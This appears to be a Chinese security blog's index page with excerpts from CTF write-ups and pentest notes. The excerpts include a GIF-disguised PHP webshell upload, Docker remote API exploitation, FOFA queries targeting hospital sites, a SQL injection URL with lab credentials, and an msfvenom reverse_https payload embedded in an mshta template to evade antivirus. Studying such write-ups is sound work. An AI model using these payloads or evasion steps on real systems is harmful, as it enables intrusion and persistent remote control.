HGAME-2024-WEEK-1-部分wp
webreverseezIDA下载程序直接,记事本右键打开就可以了, ezASM1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17, 80, 81, 17, 95, 34 flag db 33 dup(0) format db "plz input your flag: ", 0 success db "Congratulations!", 0 failure db "Sry, plz try again", 0section...
polarctfweb刷题记录2
webezupload文件上传,随便穿一个东西发现需要传gif,改一个 123Content-Type: image/gifGIF89A<?php eval($_POST['a']);?> 即可 自由的文件上传系统文件上传+文件包含随意传个文件,包含一下即可 代码审计1给了源码 1234567891011<?phphighlight_file(__FILE__);include('flag.php');$sys = $_GET['sys'];if (preg_match("|flag|", $xsx)) { die("flag is no here!");} else { $xsx = $_GET['xsx']; echo new $sys($xsx);} 当我们看到new...
k8s学习及漏洞复现-下
1.1docker remote api (2375)k8s与docker总是并行出现的,那么如果docker出现问题,也将是严重的。这里笔者学习复现一下docker的漏洞,docker远程访问漏洞。fofa指纹app="docker-Daemon" shodan **port:”2375″ country:”JP” Docker**测试是否存在漏洞,这里可以看到,fofa出来的并不是都是2375端口,也可能是附近的,都一样,正常是404,然后加个version,或者2376/containers/json出现信息,也可证明存在漏洞 也可以使用命令进行获取到相关容器。 1.2搭建本地漏洞接下来的操作没有授权,就搭建了一个环境,使用vulhub搭建,很方便。https://github.com/vulhub/vulhub,安装完docker即可 123cd /vulhub/docker/unauthorized-rcedocker-compose builddocker-compose up -d 这里我们pull一个镜像,这里报了一个错,Using...
k8s学习及漏洞复现-上
k8s基础知识常见的pod状态 pod pod常见的状态:第一阶段:挂起(Pending):1、正在创建Pod但是Pod中的容器还没有全部被创建完成,处于此状态的Pod应该检查Pod依赖的存储是否有权限挂载、镜像是否可以下载、调度是否正常等2、我们在请求创建pod时,条件不满足,调度没有完成,没有任何一个节点能满足调度条件,已经创建了pod但是没有适合它运行的节点叫做挂起,调度没有完成。 失败(Failed):Pod 中的所有容器都已终止了,并且至少有一个容器是因为失败终止。也就是说,容器以非0状态退出或者被系统终止。未知(Unknown):未知状态,所谓pod是什么状态是apiserver和运行在pod节点的kubelet进行通信获取状态信息的,如果节点之上的kubelet本身出故障,那么apiserver就连不上kubelet,得不到信息了,就会看Unknown,通常是由于与pod所在的node节点通信错误。 Error 状态:Pod...
polarctfweb刷题记录
misc0和255给到一个py文件,是图片生成坐标点的,也给了坐标点,找chatgpt问一下还原一下代码 12345678910111213141516171819from PIL import Image# 输入坐标点列表image_list = [[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255,...
shizhanzhongdeyixietips
fofa1234567891011121314151617181920country="CN"&&(title="医疗"||title="医院")&&city="山东"title="目标名称" && region="shandong" city="jinan"(title="医院" || title="医疗" || title="卫生健康"|| title="卫健委" || body="医疗")&& region="山东省" cert="目标域名或者证书关键字" && region="xx省" cert="医疗" && city="济南市"...
NewStarCTF2023公开赛道WEEK3
webInclude 🍐经典文件包含写shell,进行rce, 12345678910111213141516<?php error_reporting(0); if(isset($_GET['file'])) { $file = $_GET['file']; if(preg_match('/flag|log|session|filter|input|data/i', $file)) { die('hacker!'); } include($file.".php"); # Something in phpinfo.php! } else { highlight_file(__FILE__); ...
sqlserver上线csormsf
当我没拿到一个sqlserver的权限时,权限很小,且有waf的情况下,且只能透过web执行命令,上线到msf或者cs。 先看一下杀软 很多,还有国外的。 这里采用mshta免杀上线,参考文章https://www.zhihuifly.com/t/topic/2534 首先整个模板文件https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta,在这个里, 然后使用cs 或者msf生成一个raw 文件 msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin cs attacks 这里注意是32位的 然后cat payload.bin | base64 -w 0 把得到的内容写进模板里 然后起一个python服务器即可, msf的要起监听 use exploit/multi/handler payload...
cfs
root密码:teamssix.com 此主机的IP地址:192.168.1.11192.168.22.11 宝塔后台登陆地址及密码:地址:http://192.168.1.11:8888/a768f109/账号:eaj3yhsl密码:41bb8fee root密码:teamssix.com 此主机的IP地址:192.168.22.22192.168.33.22 宝塔后台登陆地址及密码:地址:http://192.168.22.22:8888/2cc52ec0/账号:xdynr37d密码:123qwe.. GET /index.php?r=vul&keyword=1’ union%20select%20database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39–%20123http://192.168.22.129/index.php?r=vul&keyword=1' union...